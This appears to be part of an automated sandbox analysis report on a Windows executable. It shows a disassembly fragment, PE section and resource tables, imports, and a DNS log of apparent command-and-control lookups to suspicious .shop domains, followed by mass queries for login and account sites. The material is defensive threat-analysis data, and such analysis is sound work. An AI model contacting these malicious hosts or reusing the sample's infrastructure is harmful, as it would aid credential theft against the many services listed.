                                                                                                                                                                                                                                                                                                                                                                cmp esi, eax
                                                                                                                                                                                                                                                                                                                                                                jne 00007F45CD26801Fh
                                                                                                                                                                                                                                                                                                                                                                push dword ptr [ebp+0Ch]
                                                                                                                                                                                                                                                                                                                                                                call 00007F45CD26C97Bh
                                                                                                                                                                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                                                                                                                                                                jne 00007F45CD268019h
                                                                                                                                                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                                                                                                                                                call 00007F45CD26C927h
                                                                                                                                                                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                                                                                                                                                                test dword ptr [esi+0Ch], 00000108h
                                                                                                                                                                                                                                                                                                                                                                push edi
                                                                                                                                                                                                                                                                                                                                                                je 00007F45CD268096h
                                                                                                                                                                                                                                                                                                                                                                mov eax, dword ptr [esi+08h]
                                                                                                                                                                                                                                                                                                                                                                mov edi, dword ptr [esi]
                                                                                                                                                                                                                                                                                                                                                                lea ecx, dword ptr [eax+01h]
                                                                                                                                                                                                                                                                                                                                                                mov dword ptr [esi], ecx

                                                                                                                                                                                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x2c2ac0x50.rdata
                                                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x400000x1a478.rsrc
                                                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x271e00x1c.rdata
                                                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2bb680x40.rdata
                                                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x270000x194.rdata
                                                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                                                                                                Sections

                                                                                                                                                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                                                                                .text0x10000x253f60x254008c0da6816527165647142510d16819e6False0.8168322671979866data7.661739793438813IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                                                .rdata0x270000x5be40x5c003ff899a61d3daac4169650995ca2e66eFalse0.43295686141304346data5.9108216114896805IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                                                .data0x2d0000x125640x520086b4cf60153402405aaba5690643a427False0.10656440548780488dBase III DBT, next free block index 7565155, 1st item "?\033"1.2328868885763893IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                                                                                .rsrc0x400000x1a4780x1a600c971fa7f697df4e845c9e9a54bd4a668False0.3953180539099526data4.679877571710922IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                                                                                                Resources

                                                                                                                                                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                                                                                                AFX_DIALOG_LAYOUT0x550a80xedata1.5714285714285714
                                                                                                                                                                                                                                                                                                                                                                PIFAFESESUDAFOREMANIBOBIPIRIY0x532280x1e31ASCII text, with very long lines (7729), with no line terminatorsRomanianRomania0.5889507051364989
                                                                                                                                                                                                                                                                                                                                                                RT_CURSOR0x550b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                                                                                                                                                                                                                                                                                                                                                                RT_CURSOR0x55f600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                                                                                                                                                                                                                                                                                                                                                                RT_CURSOR0x568080x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                                                                                                                                                                                                                                                                                                                                                                RT_CURSOR0x56da00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.26439232409381663
                                                                                                                                                                                                                                                                                                                                                                RT_CURSOR0x57c480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.3686823104693141
                                                                                                                                                                                                                                                                                                                                                                RT_CURSOR0x584f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.49060693641618497
                                                                                                                                                                                                                                                                                                                                                                RT_CURSOR0x58a880x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
                                                                                                                                                                                                                                                                                                                                                                RT_CURSOR0x58bb80xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x409f00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0RomanianRomania0.4341684434968017
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x418980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0RomanianRomania0.5550541516245487
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x421400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0RomanianRomania0.5817972350230415
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x428080x568Device independent bitmap graphic, 16 x 32 x 8, image size 0RomanianRomania0.6062138728323699
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x42d700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0RomanianRomania0.44491701244813275
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x453180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0RomanianRomania0.4946060037523452
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x463c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0RomanianRomania0.524822695035461
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x468900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsRomanianRomania0.5167910447761194
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x477380x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsRomanianRomania0.5090252707581228
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x47fe00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsRomanianRomania0.44873271889400923
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x486a80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsRomanianRomania0.4761560693641618
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x48c100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216RomanianRomania0.2816390041493776
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x4b1b80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096RomanianRomania0.30909943714821764
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x4c2600x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304RomanianRomania0.34098360655737703
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x4cbe80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024RomanianRomania0.375886524822695
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x4d0c80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0RomanianRomania0.48640724946695096
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x4df700x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0RomanianRomania0.4666064981949459
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x4e8180x568Device independent bitmap graphic, 16 x 32 x 8, image size 0RomanianRomania0.42846820809248554
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x4ed800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0RomanianRomania0.279045643153527
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x513280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0RomanianRomania0.2901031894934334
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x523d00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0RomanianRomania0.3094262295081967
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x52d580x468Device independent bitmap graphic, 16 x 32 x 32, image size 0RomanianRomania0.33599290780141844
                                                                                                                                                                                                                                                                                                                                                                RT_STRING0x58e800x2e6dataRomanianRomania0.5013477088948787
                                                                                                                                                                                                                                                                                                                                                                RT_STRING0x591680x434dataRomanianRomania0.45260223048327136
                                                                                                                                                                                                                                                                                                                                                                RT_STRING0x595a00x394StarOffice Gallery theme i, 1677748480 objects, 1st uRomanianRomania0.46943231441048033
                                                                                                                                                                                                                                                                                                                                                                RT_STRING0x599380x4e4dataRomanianRomania0.45527156549520764
                                                                                                                                                                                                                                                                                                                                                                RT_STRING0x59e200x380dataRomanianRomania0.47767857142857145
                                                                                                                                                                                                                                                                                                                                                                RT_STRING0x5a1a00x2d4dataRomanianRomania0.48342541436464087
                                                                                                                                                                                                                                                                                                                                                                RT_ACCELERATOR0x550600x48dataRomanianRomania0.8472222222222222
                                                                                                                                                                                                                                                                                                                                                                RT_GROUP_CURSOR0x56d700x30data0.9375
                                                                                                                                                                                                                                                                                                                                                                RT_GROUP_CURSOR0x58a580x30data0.9375
                                                                                                                                                                                                                                                                                                                                                                RT_GROUP_CURSOR0x58c680x22data1.0588235294117647
                                                                                                                                                                                                                                                                                                                                                                RT_GROUP_ICON0x468280x68dataRomanianRomania0.6826923076923077
                                                                                                                                                                                                                                                                                                                                                                RT_GROUP_ICON0x4d0500x76dataRomanianRomania0.6779661016949152
                                                                                                                                                                                                                                                                                                                                                                RT_GROUP_ICON0x531c00x68dataRomanianRomania0.7115384615384616
                                                                                                                                                                                                                                                                                                                                                                RT_VERSION0x58c900x1f0MS Windows COFF PowerPC object file0.5362903225806451

                                                                                                                                                                                                                                                                                                                                                                Imports

                                                                                                                                                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                                                                                                                                                KERNEL32.dllSetComputerNameExA, SetWaitableTimer, InterlockedIncrement, GetModuleHandleW, GetTickCount, FindNextVolumeMountPointA, ReadConsoleW, EnumResourceTypesA, TlsSetValue, GetVolumeInformationA, LoadLibraryW, SetCommConfig, AssignProcessToJobObject, GetNamedPipeInfo, GetModuleFileNameW, CreateJobObjectA, InterlockedExchange, GetLogicalDriveStringsA, SetVolumeLabelA, GetProcAddress, VirtualAlloc, RemoveDirectoryA, LoadLibraryA, OpenMutexA, LocalAlloc, MoveFileA, GetNumberFormatW, GlobalFindAtomW, GetConsoleTitleW, VirtualProtect, GetFileAttributesExW, GetCurrentProcessId, AddConsoleAliasA, ReadConsoleOutputCharacterW, DeleteFileA, GetLastError, GetSystemDefaultLangID, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, HeapFree, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, TlsGetValue, TlsAlloc, TlsFree, SetLastError, GetCurrentThreadId, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, EnterCriticalSection, LeaveCriticalSection, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, GetModuleHandleA, RaiseException, HeapAlloc, HeapReAlloc, InitializeCriticalSectionAndSpinCount, RtlUnwind, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, CreateFileA, CloseHandle, FlushFileBuffers
                                                                                                                                                                                                                                                                                                                                                                USER32.dllLoadMenuW
                                                                                                                                                                                                                                                                                                                                                                GDI32.dllGetCharABCWidthsFloatW

                                                                                                                                                                                                                                                                                                                                                                Possible Origin

                                                                                                                                                                                                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                                                                                                RomanianRomania

                                                                                                                                                                                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:17.492399931 CET192.168.2.61.1.1.10xcac4Standard query (0)selebration17io.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:23.749666929 CET192.168.2.61.1.1.10x8059Standard query (0)resergvearyinitiani.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:26.959105015 CET192.168.2.61.1.1.10x5c60Standard query (0)gemcreedarticulateod.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:27.191096067 CET192.168.2.61.1.1.10x117cStandard query (0)real.avalmag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:28.157087088 CET192.168.2.61.1.1.10xdb3Standard query (0)secretionsuitcasenioise.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:29.527760983 CET192.168.2.61.1.1.10xed3dStandard query (0)claimconcessionrebe.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:30.768451929 CET192.168.2.61.1.1.10xcb98Standard query (0)liabilityarrangemenyit.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:36.855995893 CET192.168.2.61.1.1.10xf5a6Standard query (0)trmpc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:37.857356071 CET192.168.2.61.1.1.10xf5a6Standard query (0)trmpc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:38.857456923 CET192.168.2.61.1.1.10xf5a6Standard query (0)trmpc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:40.857187033 CET192.168.2.61.1.1.10xf5a6Standard query (0)trmpc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:30.818542957 CET192.168.2.6152.89.198.2140x144Standard query (0)csefujt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.031873941 CET192.168.2.61.1.1.10x204cStandard query (0)zuhauseplus.vodafone.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.031873941 CET192.168.2.61.1.1.10xaf11Standard query (0)milogin.michigan.govMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.032249928 CET192.168.2.61.1.1.10x23eeStandard query (0)steamcommunity.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.032284975 CET192.168.2.61.1.1.10x6e4bStandard query (0)contribuyente.seniat.gob.veMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.032649040 CET192.168.2.61.1.1.10xa3f2Standard query (0)login.microsoftonline.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.032763958 CET192.168.2.61.1.1.10xd122Standard query (0)nuevopacto.runacode.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.033127069 CET192.168.2.61.1.1.10x5018Standard query (0)signup.takendelight.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.033318043 CET192.168.2.61.1.1.10x4d6dStandard query (0)servicossociais.caixa.gov.brMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.033318043 CET192.168.2.61.1.1.10xdfeeStandard query (0)naukrigulf.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.035196066 CET192.168.2.61.1.1.10x84dcStandard query (0)pan.baidu.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.037189960 CET192.168.2.61.1.1.10x56a0Standard query (0)accounts.faceit.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.055799961 CET192.168.2.61.1.1.10x4c08Standard query (0)multiideas.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.057538986 CET192.168.2.61.1.1.10x8e07Standard query (0)us04web.zoom.usMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.059516907 CET192.168.2.61.1.1.10xf5dfStandard query (0)opsu.terna.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.060040951 CET192.168.2.61.1.1.10x9712Standard query (0)aeaaamorim.inovarmais.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.060581923 CET192.168.2.61.1.1.10xc06dStandard query (0)midetuvelocidad.claro.com.peMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.060945988 CET192.168.2.61.1.1.10x8097Standard query (0)signin.rockstargames.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.061202049 CET192.168.2.61.1.1.10xe216Standard query (0)0260049m.index-education.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.061326027 CET192.168.2.61.1.1.10x8214Standard query (0)accounts.ecitizen.go.keMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.062321901 CET192.168.2.61.1.1.10x9c4eStandard query (0)ucivirtual.uci.edu.mxMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.063976049 CET192.168.2.61.1.1.10xeba4Standard query (0)rage.mpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.075603962 CET192.168.2.61.1.1.10xd9b1Standard query (0)netizion.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.077558041 CET192.168.2.61.1.1.10xd994Standard query (0)store.steampowered.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.082741976 CET192.168.2.61.1.1.10xe5a6Standard query (0)sii.itzacatepec.edu.mxMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.082930088 CET192.168.2.61.1.1.10xa10fStandard query (0)m.codere.com.coMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.083338022 CET192.168.2.61.1.1.10x3e7bStandard query (0)3fba-180-252-166-236.ngrok.ioMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.083645105 CET192.168.2.61.1.1.10x7f91Standard query (0)servicios.sat.gob.mxMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.084376097 CET192.168.2.61.1.1.10x663cStandard query (0)warriorplus.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.085016966 CET192.168.2.61.1.1.10xf0f6Standard query (0)upsconline.nic.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.085108995 CET192.168.2.61.1.1.10x39a2Standard query (0)money-farm.ccMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.085465908 CET192.168.2.61.1.1.10xe5f4Standard query (0)app.jobpet.com.brMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.085587025 CET192.168.2.61.1.1.10xd71eStandard query (0)lookaside.fbsbx.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.093163967 CET192.168.2.61.1.1.10x1bfStandard query (0)web.facebook.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.093532085 CET192.168.2.61.1.1.10xca1aStandard query (0)account.live.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.093570948 CET192.168.2.61.1.1.10xfde8Standard query (0)uh.isMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.093816996 CET192.168.2.61.1.1.10x4de6Standard query (0)foros.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.098053932 CET192.168.2.61.1.1.10x2d12Standard query (0)zarkana2.roMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.098103046 CET192.168.2.61.1.1.10x5d61Standard query (0)ro.bongacams.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.098488092 CET192.168.2.61.1.1.10x93ffStandard query (0)signup2.br.leagueoflegends.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.099189997 CET192.168.2.61.1.1.10x3ba1Standard query (0)genshin.mihoyo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.099536896 CET192.168.2.61.1.1.10x2b48Standard query (0)iam.gov.saMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.100938082 CET192.168.2.61.1.1.10xffccStandard query (0)api.cmrsanmartin.ziz.clMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.106801033 CET192.168.2.61.1.1.10xfff3Standard query (0)connect.appen.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.107384920 CET192.168.2.61.1.1.10x33b7Standard query (0)account.mojang.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.108002901 CET192.168.2.61.1.1.10x2931Standard query (0)authenticate.riotgames.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.108197927 CET192.168.2.61.1.1.10xd641Standard query (0)testconnect.garena.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.109210014 CET192.168.2.61.1.1.10x4cfcStandard query (0)yellosa.co.zaMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.109922886 CET192.168.2.61.1.1.10x2b10Standard query (0)chainmine.ioMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.110322952 CET192.168.2.61.1.1.10x4e7fStandard query (0)kamgarsetu.mp.gov.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.111088037 CET192.168.2.61.1.1.10xb9f0Standard query (0)gitam.zoom.usMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.112641096 CET192.168.2.61.1.1.10x9aeStandard query (0)analvids.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.116055012 CET192.168.2.61.1.1.10x6f7fStandard query (0)accounts.google.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.119235039 CET192.168.2.61.1.1.10xc6a3Standard query (0)pxndx-mcr.boletia.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.142030001 CET192.168.2.61.1.1.10xe1d8Standard query (0)auth.cambridgelms.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.142030001 CET192.168.2.61.1.1.10x4641Standard query (0)sii.ittlahuac.edu.mxMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.148274899 CET192.168.2.61.1.1.10xbdedStandard query (0)ag.ufa9999.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.148818970 CET192.168.2.61.1.1.10x4355Standard query (0)kwyk.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.149576902 CET192.168.2.61.1.1.10x1396Standard query (0)login.adf.lyMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.151149035 CET192.168.2.61.1.1.10x3e7Standard query (0)sport.autoplay.cloudMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.152782917 CET192.168.2.61.1.1.10x4d06Standard query (0)ssc.nic.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.155185938 CET192.168.2.61.1.1.10x8ef0Standard query (0)service.uan.edu.coMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.156346083 CET192.168.2.61.1.1.10x9917Standard query (0)mobile.liga365gacor.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.156965017 CET192.168.2.61.1.1.10x2142Standard query (0)loopex.ioMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.157313108 CET192.168.2.61.1.1.10x7942Standard query (0)hartico.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.158951998 CET192.168.2.61.1.1.10x3565Standard query (0)login2.innova.puglia.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.159816980 CET192.168.2.61.1.1.10x5ef2Standard query (0)tiktok.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.165004015 CET192.168.2.61.1.1.10x17b4Standard query (0)cjdropshipping.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.340632915 CET192.168.2.61.1.1.10xc25eStandard query (0)srienlinea.sri.gob.ecMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.340914965 CET192.168.2.61.1.1.10x58e2Standard query (0)ucv.blackboard.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.340998888 CET192.168.2.61.1.1.10x8df0Standard query (0)casinocontroller.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.341166973 CET192.168.2.61.1.1.10xcb6bStandard query (0)th-th.facebook.comMX (Mail exchange)IN (0x0001)false
